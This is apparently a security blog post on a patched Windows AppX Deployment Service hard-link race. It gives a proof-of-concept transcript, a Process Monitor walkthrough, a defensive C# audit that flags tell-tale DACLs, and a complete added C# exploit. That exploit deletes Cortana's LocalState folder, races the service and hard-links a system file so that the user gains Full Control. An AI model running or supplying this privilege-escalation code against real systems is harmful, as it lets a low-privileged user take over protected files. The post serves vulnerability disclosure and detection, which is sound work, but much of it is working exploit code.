Intro

Security researcher SandboxEscaper dropped a zero-day this week exploiting a race condition in the Windows AppX Deployment Service (AppXSVC). The root cause is the service not handling hard links safely when it re-applies permissions to files in a user-controlled folder. Another zero-day affecting the same service, CVE-2019-0841, was fixed in April.

As Microsoft have now provided a fix for this in June's Patch Tuesday updates, I've ported SandboxEscaper's original PoC to C# (thanks to Rastamouse for C# hand holding). The original PoC targeted Microsoft Edge, which I found unstable and a bit fiddly. Targeting Cortana instead appears to be more stable and doesn't require any user interaction if you're prepared to wait a while. Alternatively, clicking the Start Menu seems to kick it into life.

Details

When any of the per-package folder structures under a user's AppData\Local\Packages is removed, it gets recreated the next time the corresponding app (whose binaries live under C:\WINDOWS\SystemApps\) is launched. The recreation is not done by the app itself but by AppXSVC.

For instance, if we remove C:\users\rythmstick\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy, the folder structure will get recreated when Cortana is next launched via
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchIU.exe -ServerName:CortanaUI.AppXa....epj.mca


Whilst recreating the folder structure, the DACLs on the contents of the LocalState folder get re-applied by AppXSVC running as NT AUTHORITY\SYSTEM. A hard link is simply a second directory entry for the same NTFS file, so a security descriptor written through the link is written to the target file. If we can drop a hard link into LocalState between the folder being created and the DACLs being applied, SYSTEM will write the LocalState DACL, which grants our user Full Control, onto any file that NT AUTHORITY\SYSTEM has full control of. The only constraint on the target is that it must be on the same volume as the user profile, since hard links cannot cross volumes.

Proof of Concept

C:\Users\rythmstick>icacls c:\windows\system.ini
c:\windows\system.ini NT AUTHORITY\SYSTEM:(I)(F)
                      BUILTIN\Administrators:(I)(F)
                      BUILTIN\Users:(I)(RX)
                      APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                      APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APP PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

C:\Users\rythmstick>AppXSVC_poc.exe c:\windows\system.ini
[+] Removing C:\Users\rythmstick\AppData\Local\packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState
[+] Waiting to Create Hardlink
[+] Created Hardlink to c:\windows\system.ini
[+] You have Full Control

C:\Users\rythmstick>icacls c:\windows\system.ini
c:\windows\system.ini S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742:(I)(F)
                      NT AUTHORITY\SYSTEM:(I)(F)
                      BUILTIN\Administrators:(I)(F)
                    * DESKTOP\rythmstick:(I)(F)
                      Mandatory Label\Low Mandatory Level:(I)(NW)

Successfully processed 1 files; Failed processing 0 files

C:\Users\rythmstick>
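
The icacls output above is also the forensic artefact this technique leaves behind: a system file that suddenly carries a per-app package SID (S-1-15-2-...) and the interactive user with Full Control. As an added example that is not part of the PoC or of this post's original code, the following C# audit walks a directory and reports any Allow ACE of that shape. It assumes .NET Framework 4.x on Windows; the scan root, the "expected Full Control" SID list and the two well-known package SIDs it ignores are illustrative choices, not a definitive whitelist.

```csharp
// Added example (not the author's PoC): audit files for DACLs that look like the
// post-exploitation state shown above. Assumes .NET Framework 4.x on Windows.
using System;
using System.Collections.Generic;
using System.IO;
using System.Security.AccessControl;
using System.Security.Principal;

static class DaclAudit
{
    // Accounts that legitimately hold Full Control on files under C:\Windows (illustrative list).
    static readonly HashSet<string> ExpectedFullControl = new HashSet<string>
    {
        "S-1-5-18",      // NT AUTHORITY\SYSTEM
        "S-1-5-32-544",  // BUILTIN\Administrators
        "S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464", // NT SERVICE\TrustedInstaller
    };

    // ALL APPLICATION PACKAGES / ALL RESTRICTED APPLICATION PACKAGES: normal on system files (RX).
    static readonly HashSet<string> WellKnownPackageSids = new HashSet<string> { "S-1-15-2-1", "S-1-15-2-2" };

    // Returns a description of each suspicious Allow ACE on one file (empty list = nothing odd).
    public static List<string> SuspiciousAces(string path)
    {
        var findings = new List<string>();
        FileSecurity acl = new FileInfo(path).GetAccessControl(AccessControlSections.Access);
        foreach (FileSystemAccessRule rule in acl.GetAccessRules(true, true, typeof(SecurityIdentifier)))
        {
            if (rule.AccessControlType != AccessControlType.Allow) continue;
            string sid = rule.IdentityReference.Value;
            bool full = (rule.FileSystemRights & FileSystemRights.FullControl) == FileSystemRights.FullControl;

            // A per-package AppContainer SID on a system file is the tell-tale left by AppXSVC
            // re-applying the LocalState DACL through a hard link.
            if (sid.StartsWith("S-1-15-2-", StringComparison.Ordinal) && !WellKnownPackageSids.Contains(sid))
                findings.Add(path + ": package SID " + sid + " granted " + rule.FileSystemRights);
            else if (full && !ExpectedFullControl.Contains(sid))
                findings.Add(path + ": " + FriendlyName(rule.IdentityReference) + " granted Full Control");
        }
        return findings;
    }

    static string FriendlyName(IdentityReference id)
    {
        try { return id.Translate(typeof(NTAccount)).Value; }
        catch (IdentityNotMappedException) { return id.Value; }
    }

    static void Main(string[] args)
    {
        // Non-recursive so it finishes quickly; pass a narrower directory as the argument to go deeper.
        string root = args.Length > 0 ? args[0] : Environment.GetFolderPath(Environment.SpecialFolder.Windows);
        int hits = 0;
        foreach (string file in Directory.EnumerateFiles(root))
        {
            List<string> findings;
            try { findings = SuspiciousAces(file); }
            catch (UnauthorizedAccessException) { continue; } // DACL not readable as the current user
            catch (IOException) { continue; }
            foreach (string f in findings) { Console.WriteLine("[!] " + f); hits++; }
        }
        Console.WriteLine(hits == 0
            ? "[+] No unexpected ACEs found under " + root
            : "[!] " + hits + " unexpected ACE(s) found under " + root);
    }
}
```

Run it without arguments to scan the top level of C:\Windows; against the box above it would flag c:\windows\system.ini twice, once for the package SID and once for DESKTOP\rythmstick. The Low mandatory label in the icacls output is in the SACL, which needs SeSecurityPrivilege to read, so this check deliberately sticks to the DACL.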


Let’s see what happened in Process Monitor.

screenshot

Our PoC removes the LocalState folder.

(1) It then goes into a loop waiting for the LocalState folder to be recreated by AppXSVC.

(2) AppXSVC recreates the LocalState folder running as NT AUTHORITY\SYSTEM.

(3) Our PoC finds the LocalState folder and immediately creates the hard link rs.txt to C:\WINDOWS\SYSTEM.INI. You can see the SetLinkInformationFile operation directly below (3).

screenshot

(4) AppXSVC enumerates the contents of the LocalState folder and ‘picks up’ our hard link.

screenshot

(5) AppXSVC amends the DACL on our hard link, which is the DACL of C:\WINDOWS\SYSTEM.INI itself, giving our user Full Control.

screenshot


The PoC is available here. As this is a race condition you may need to run the PoC a few times, although it seems to win quite often after increasing the thread priority.
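To make the five ProcMon steps concrete, here is what the core of such a PoC looks like in C#. This is an added reconstruction written for this page; it is neither SandboxEscaper's PoC nor the C# port linked above. It assumes .NET Framework 4.x on an unpatched Windows 10 build, the Cortana package name shown earlier and the link name rs.txt from the trace, and it uses the Win32 CreateHardLink API to create the link, which is an assumption about how the original creates it.

```csharp
// Added example reconstructing the race described above; not the author's or SandboxEscaper's code.
// Assumptions: .NET Framework 4.x, an unpatched build (pre June 2019 updates), Win32 CreateHardLink
// for the link, and the Cortana package folder and rs.txt link name shown in this post.
using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Security.AccessControl;
using System.Security.Principal;
using System.Threading;

class AppXSvcRace
{
    [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    static extern bool CreateHardLink(string lpFileName, string lpExistingFileName, IntPtr lpSecurityAttributes);

    const string Package = "Microsoft.Windows.Cortana_cw5n1h2txyewy";

    static int Main(string[] args)
    {
        if (args.Length != 1) { Console.WriteLine("usage: AppXSVC_poc <target file on the same volume>"); return 1; }
        string target = Path.GetFullPath(args[0]);
        string localState = Path.Combine(
            Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Packages", Package, "LocalState");
        string link = Path.Combine(localState, "rs.txt"); // name seen in the ProcMon trace above

        // Remove LocalState so that AppXSVC has to recreate it (as NT AUTHORITY\SYSTEM).
        Console.WriteLine("[+] Removing " + localState);
        if (Directory.Exists(localState)) Directory.Delete(localState, true);

        // (1) Spin until the folder reappears. A high thread priority helps us win the window
        //     between the folder being created and its contents' DACLs being re-applied.
        Thread.CurrentThread.Priority = ThreadPriority.Highest;
        Console.WriteLine("[+] Waiting to Create Hardlink (launch Cortana or click Start to hurry it along)");
        while (!Directory.Exists(localState)) { /* busy-wait: every Sleep here widens the race */ }

        // (3) Drop the hard link into LocalState before AppXSVC enumerates it.
        if (!CreateHardLink(link, target, IntPtr.Zero))
        {
            Console.WriteLine("[-] CreateHardLink failed, Win32 error " + Marshal.GetLastWin32Error());
            return 1;
        }
        Console.WriteLine("[+] Created Hardlink to " + target);

        // (4)-(5) AppXSVC picks up the link and writes the LocalState DACL onto the target.
        //         Poll the target's DACL for a while instead of assuming we won.
        for (int i = 0; i < 300; i++)
        {
            if (HasFullControl(target)) { Console.WriteLine("[+] You have Full Control"); return 0; }
            Thread.Sleep(100);
        }
        Console.WriteLine("[-] Lost the race; run the PoC again");
        return 1;
    }

    // True when the current user's own SID holds Full Control on the file, directly or inherited.
    static bool HasFullControl(string path)
    {
        SecurityIdentifier me = WindowsIdentity.GetCurrent().User;
        FileSecurity acl = new FileInfo(path).GetAccessControl(AccessControlSections.Access);
        foreach (FileSystemAccessRule r in acl.GetAccessRules(true, true, typeof(SecurityIdentifier)))
        {
            if (r.AccessControlType == AccessControlType.Allow
                && me.Equals(r.IdentityReference)
                && (r.FileSystemRights & FileSystemRights.FullControl) == FileSystemRights.FullControl)
                return true;
        }
        return false;
    }
}
```

Usage mirrors the transcript above: AppXSVC_poc.exe c:\windows\system.ini, then either wait or click the Start Menu so Cortana launches and triggers the recreation. The Directory.Delete call will throw if Cortana currently holds a file open under LocalState, and the whole thing only does anything on a build without the June 2019 fix; on a patched machine the link is created but the DACL is never rewritten and the loop times out.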